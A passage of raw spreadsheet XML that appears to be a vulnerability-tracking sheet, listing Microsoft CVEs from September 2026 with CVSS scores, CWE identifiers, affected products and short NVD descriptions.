t="inlineStr"><is><t>HIGH</t></is></c><c r="F732" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G732" s="5" t="inlineStr" /><c r="H732" s="5" t="n"><v>0.011</v></c><c r="I732" s="5" t="inlineStr" /><c r="J732" s="5" t="inlineStr" /><c r="K732" s="5" t="inlineStr" /><c r="L732" s="5" t="inlineStr" /><c r="M732" s="5" t="inlineStr" /><c r="N732" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O732" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P732" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q732" s="5" t="inlineStr" /><c r="R732" s="5" t="inlineStr"><is><t>CWE-674</t></is></c><c r="S732" s="5" t="inlineStr"><is><t>Uncontrolled recursion in Microsoft Exchange Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T732" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69378</t></is></c></row><row r="733"><c r="A733" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B733" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C733" s="5" t="inlineStr"><is><t>CVE-2026-69397</t></is></c><c r="D733" s="5" t="n"><v>7.5</v></c><c r="E733" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F733" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G733" s="5" t="inlineStr" /><c r="H733" s="5" t="n"><v>0.006</v></c><c r="I733" s="5" t="inlineStr" /><c r="J733" s="5" t="inlineStr"><is><t>openssh</t></is></c><c r="K733" s="5" t="inlineStr" /><c r="L733" s="5" t="inlineStr" /><c r="M733" s="5" t="inlineStr" /><c r="N733" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O733" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P733" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q733" s="5" t="inlineStr" /><c r="R733" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S733" s="5" t="inlineStr"><is><t>Use after free in OpenSSH for Windows allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T733" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69397</t></is></c></row><row r="734"><c r="A734" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B734" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C734" s="5" t="inlineStr"><is><t>CVE-2026-69428</t></is></c><c r="D734" s="5" t="n"><v>7.5</v></c><c r="E734" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F734" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G734" s="5" t="inlineStr" /><c r="H734" s="5" t="n"><v>0.011</v></c><c r="I734" s="5" t="inlineStr" /><c r="J734" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K73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34" s="5" t="inlineStr" /><c r="M734" s="5" t="inlineStr" /><c r="N734" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O734" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P734" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q734" s="5" t="inlineStr" /><c r="R734" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S734" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T734" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69428</t></is></c></row><row r="735"><c r="A735" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B735" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C735" s="5" t="inlineStr"><is><t>CVE-2026-69429</t></is></c><c r="D735" s="5" t="n"><v>7.5</v></c><c r="E735" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F735" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G735" s="5" t="inlineStr" /><c r="H735" s="5" t="n"><v>0.006</v></c><c r="I735" s="5" t="inlineStr" /><c r="J735" s="5" t="inlineStr" /><c r="K735" s="5" t="inlineStr" /><c r="L735" s="5" t="inlineStr" /><c r="M735" s="5" t="inlineStr" /><c r="N735" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O735" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P735" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q735" s="5" t="inlineStr" /><c r="R735" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S735" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows IKE Extension allows an authorized attacker to execute code over a network.</t></is></c><c r="T735" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69429</t></is></c></row><row r="736"><c r="A736" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B736" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C736" s="5" t="inlineStr"><is><t>CVE-2026-69443</t></is></c><c r="D736" s="5" t="n"><v>7.5</v></c><c r="E736" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F736" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G736" s="5" t="inlineStr" /><c r="H736" s="5" t="n"><v>0.01</v></c><c r="I736" s="5" t="inlineStr" /><c r="J736" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K736" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L736" s="5" t="inlineStr" /><c r="M736" s="5" t="inlineStr" /><c r="N736" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O736" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P736" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q736" s="5" t="inlineStr" /><c r="R736" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S736" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Device Health Attestation (DHA) allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T736" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69443</t></is></c></row><row r="737"><c r="A737" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B737" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C737" s="5" t="inlineStr"><is><t>CVE-2026-69514</t></is></c><c r="D737" s="5" t="n"><v>7.5</v></c><c r="E737" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F737" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G737" s="5" t="inlineStr" /><c r="H737" s="5" t="n"><v>0.007</v></c><c r="I737" s="5" t="inlineStr" /><c r="J737" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K73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37" s="5" t="inlineStr" /><c r="M737" s="5" t="inlineStr" /><c r="N737" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O737" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P737" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q737" s="5" t="inlineStr" /><c r="R737" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S737" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T737" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69514</t></is></c></row><row r="738"><c r="A738" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B738" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C738" s="5" t="inlineStr"><is><t>CVE-2026-69539</t></is></c><c r="D738" s="5" t="n"><v>7.5</v></c><c r="E738" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F738" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G738" s="5" t="inlineStr" /><c r="H738" s="5" t="n"><v>0.005</v></c><c r="I738" s="5" t="inlineStr" /><c r="J738" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K73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38" s="5" t="inlineStr" /><c r="M738" s="5" t="inlineStr" /><c r="N738" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O738" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P738" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q738" s="5" t="inlineStr" /><c r="R738" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S738" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T738" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69539</t></is></c></row><row r="739"><c r="A739" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B739" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C739" s="5" t="inlineStr"><is><t>CVE-2026-69587</t></is></c><c r="D739" s="5" t="n"><v>7.5</v></c><c r="E739" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F739" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G739" s="5" t="inlineStr" /><c r="H739" s="5" t="n"><v>0.012</v></c><c r="I739" s="5" t="inlineStr" /><c r="J739" s="5" t="inlineStr" /><c r="K739" s="5" t="inlineStr" /><c r="L739" s="5" t="inlineStr" /><c r="M739" s="5" t="inlineStr" /><c r="N739" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O739" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P739" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q739" s="5" t="inlineStr" /><c r="R739" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S739" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T739" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69587</t></is></c></row><row r="740"><c r="A740" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B740" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C740" s="5" t="inlineStr"><is><t>CVE-2026-69588</t></is></c><c r="D740" s="5" t="n"><v>7.5</v></c><c r="E740" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F740" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G740" s="5" t="inlineStr" /><c r="H740" s="5" t="n"><v>0.012</v></c><c r="I740" s="5" t="inlineStr" /><c r="J740" s="5" t="inlineStr" /><c r="K740" s="5" t="inlineStr" /><c r="L740" s="5" t="inlineStr" /><c r="M740" s="5" t="inlineStr" /><c r="N740" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O740" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P740" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q740" s="5" t="inlineStr" /><c r="R740" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S740" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows TCP/IP allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T740" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69588</t></is></c></row><row r="741"><c r="A741" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B741" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C741" s="5" t="inlineStr"><is><t>CVE-2026-69599</t></is></c><c r="D741" s="5" t="n"><v>7.5</v></c><c r="E741" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F741" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G741" s="5" t="inlineStr" /><c r="H741" s="5" t="n"><v>0.007</v></c><c r="I741" s="5" t="inlineStr" /><c r="J741" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K741" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L741" s="5" t="inlineStr" /><c r="M741" s="5" t="inlineStr" /><c r="N741" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O741" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P741" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q741" s="5" t="inlineStr" /><c r="R741" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S741" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T741" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69599</t></is></c></row><row r="742"><c r="A742" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B742" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C742" s="5" t="inlineStr"><is><t>CVE-2026-69607</t></is></c><c r="D742" s="5" t="n"><v>7.5</v></c><c r="E742" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F742" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G742" s="5" t="inlineStr" /><c r="H742" s="5" t="n"><v>0.006</v></c><c r="I742" s="5" t="inlineStr" /><c r="J742" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K742" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L742" s="5" t="inlineStr" /><c r="M742" s="5" t="inlineStr" /><c r="N742" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O742" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P742" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q742" s="5" t="inlineStr" /><c r="R742" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S742" s="5" t="inlineStr"><is><t>Use after free in Windows Deployment Services allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T742" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69607</t></is></c></row><row r="743"><c r="A743" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B743" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C743" s="5" t="inlineStr"><is><t>CVE-2026-69631</t></is></c><c r="D743" s="5" t="n"><v>7.5</v></c><c r="E743" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F743" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G743" s="5" t="inlineStr" /><c r="H743" s="5" t="n"><v>0.012</v></c><c r="I743" s="5" t="inlineStr" /><c r="J743" s="5" t="inlineStr" /><c r="K743" s="5" t="inlineStr" /><c r="L743" s="5" t="inlineStr" /><c r="M743" s="5" t="inlineStr" /><c r="N743" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O743" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P743" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q743" s="5" t="inlineStr" /><c r="R743" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S743" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows DNS allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T743" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69631</t></is></c></row><row r="744"><c r="A744" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B744" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C744" s="5" t="inlineStr"><is><t>CVE-2026-69710</t></is></c><c r="D744" s="5" t="n"><v>7.5</v></c><c r="E744" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F744" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G744" s="5" t="inlineStr" /><c r="H744" s="5" t="n"><v>0.002</v></c><c r="I744" s="5" t="inlineStr" /><c r="J744" s="5" t="inlineStr" /><c r="K744" s="5" t="inlineStr" /><c r="L744" s="5" t="inlineStr" /><c r="M744" s="5" t="inlineStr" /><c r="N744" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O744" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P744" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q744" s="5" t="inlineStr" /><c r="R744" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S744" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T744" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69710</t></is></c></row><row r="745"><c r="A745" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B745" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C745" s="5" t="inlineStr"><is><t>CVE-2026-69739</t></is></c><c r="D745" s="5" t="n"><v>7.5</v></c><c r="E745" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F745" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G745" s="5" t="inlineStr" /><c r="H745" s="5" t="n"><v>0.008999999999999999</v></c><c r="I745" s="5" t="inlineStr" /><c r="J745" s="5" t="inlineStr" /><c r="K745" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L745" s="5" t="inlineStr" /><c r="M745" s="5" t="inlineStr" /><c r="N745" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O745" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P745" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q745" s="5" t="inlineStr" /><c r="R745" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S745" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T745" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69739</t></is></c></row><row r="746"><c r="A746" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B746" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C746" s="5" t="inlineStr"><is><t>CVE-2026-69744</t></is></c><c r="D746" s="5" t="n"><v>7.5</v></c><c r="E746" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F746" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G746" s="5" t="inlineStr" /><c r="H746" s="5" t="n"><v>0.011</v></c><c r="I746" s="5" t="inlineStr" /><c r="J746" s="5" t="inlineStr" /><c r="K746" s="5" t="inlineStr" /><c r="L746" s="5" t="inlineStr" /><c r="M746" s="5" t="inlineStr" /><c r="N746" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O746" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P746" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q746" s="5" t="inlineStr" /><c r="R746" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S746" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T746" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69744</t></is></c></row><row r="747"><c r="A747" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B747" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C747" s="5" t="inlineStr"><is><t>CVE-2026-69760</t></is></c><c r="D747" s="5" t="n"><v>7.5</v></c><c r="E747" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F747" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G747" s="5" t="inlineStr" /><c r="H747" s="5" t="n"><v>0.011</v></c><c r="I747" s="5" t="inlineStr" /><c r="J747" s="5" t="inlineStr" /><c r="K747" s="5" t="inlineStr" /><c r="L747" s="5" t="inlineStr" /><c r="M747" s="5" t="inlineStr" /><c r="N747" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O747" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P747" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q747" s="5" t="inlineStr" /><c r="R747" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S747" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T747" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69760</t></is></c></row><row r="748"><c r="A748" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B748" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C748" s="5" t="inlineStr"><is><t>CVE-2026-69793</t></is></c><c r="D748" s="5" t="n"><v>7.5</v></c><c r="E748" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F748" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G748" s="5" t="inlineStr" /><c r="H748" s="5" t="n"><v>0.008</v></c><c r="I748" s="5" t="inlineStr" /><c r="J748" s="5" t="inlineStr" /><c r="K748" s="5" t="inlineStr" /><c r="L748" s="5" t="inlineStr" /><c r="M748" s="5" t="inlineStr" /><c r="N748" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O748" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P748" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q748" s="5" t="inlineStr" /><c r="R748" s="5" t="inlineStr"><is><t>CWE-1288</t></is></c><c r="S748" s="5" t="inlineStr"><is><t>Improper validation of consistency within input in Windows TCP/IP allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T748" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69793</t></is></c></row><row r="749"><c r="A749" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B749" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C749" s="5" t="inlineStr"><is><t>CVE-2026-69803</t></is></c><c r="D749" s="5" t="n"><v>7.5</v></c><c r="E749" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F749" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G749" s="5" t="inlineStr" /><c r="H749" s="5" t="n"><v>0.008</v></c><c r="I749" s="5" t="inlineStr" /><c r="J749" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K749" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L749" s="5" t="inlineStr" /><c r="M749" s="5" t="inlineStr" /><c r="N749" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O749" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P749" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q749" s="5" t="inlineStr" /><c r="R749" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S749" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T749" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69803</t></is></c></row><row r="750"><c r="A750" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B750" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C750" s="5" t="inlineStr"><is><t>CVE-2026-69804</t></is></c><c r="D750" s="5" t="n"><v>7.5</v></c><c r="E750" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F750" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G750" s="5" t="inlineStr" /><c r="H750" s="5" t="n"><v>0.005</v></c><c r="I750" s="5" t="inlineStr" /><c r="J750" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K750" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L750" s="5" t="inlineStr" /><c r="M750" s="5" t="inlineStr" /><c r="N750" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O750" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P750" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q750" s="5" t="inlineStr" /><c r="R750" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S750" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T750" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69804</t></is></c></row><row r="751"><c r="A751" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B751" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C751" s="5" t="inlineStr"><is><t>CVE-2026-69805</t></is></c><c r="D751" s="5" t="n"><v>7.5</v></c><c r="E751" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F751" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G751" s="5" t="inlineStr" /><c r="H751" s="5" t="n"><v>0.005</v></c><c r="I751" s="5" t="inlineStr" /><c r="J751" s="5" t="inlineStr" /><c r="K751" s="5" t="inlineStr" /><c r="L751" s="5" t="inlineStr" /><c r="M751" s="5" t="inlineStr" /><c r="N751" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O751" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P751" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q751" s="5" t="inlineStr" /><c r="R751" s="5" t="inlineStr"><is><t>CWE-200, CWE-522, CWE-73</t></is></c><c r="S751" s="5" t="inlineStr"><is><t>External control of file name or path in .NET allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T751" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69805</t></is></c></row><row r="752"><c r="A752" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B752" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C752" s="5" t="inlineStr"><is><t>CVE-2026-69809</t></is></c><c r="D752" s="5" t="n"><v>7.5</v></c><c r="E752" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F752" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G752" s="5" t="inlineStr" /><c r="H752" s="5" t="n"><v>0.011</v></c><c r="I752" s="5" t="inlineStr" /><c r="J752" s="5" t="inlineStr" /><c r="K752" s="5" t="inlineStr" /><c r="L752" s="5" t="inlineStr" /><c r="M752" s="5" t="inlineStr" /><c r="N752" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O752" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P752" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q752" s="5" t="inlineStr" /><c r="R752" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S752" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Active Directory Domain Services allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T752" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69809</t></is></c></row><row r="753"><c r="A753" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B753" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C753" s="5" t="inlineStr"><is><t>CVE-2026-69852</t></is></c><c r="D753" s="5" t="n"><v>7.5</v></c><c r="E753" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F753" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G753" s="5" t="inlineStr" /><c r="H753" s="5" t="n"><v>0.006</v></c><c r="I753" s="5" t="inlineStr" /><c r="J753" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K75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53" s="5" t="inlineStr" /><c r="M753" s="5" t="inlineStr" /><c r="N753" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O753" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P753" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q753" s="5" t="inlineStr" /><c r="R753" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S753" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="T753" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69852</t></is></c></row><row r="754"><c r="A754" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B754" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C754" s="5" t="inlineStr"><is><t>CVE-2026-69881</t></is></c><c r="D754" s="5" t="n"><v>7.5</v></c><c r="E754" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F754" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G754" s="5" t="inlineStr" /><c r="H754" s="5" t="n"><v>0.012</v></c><c r="I754" s="5" t="inlineStr" /><c r="J754" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K754"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754" s="5" t="inlineStr" /><c r="M754" s="5" t="inlineStr" /><c r="N754" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O754" s="5" 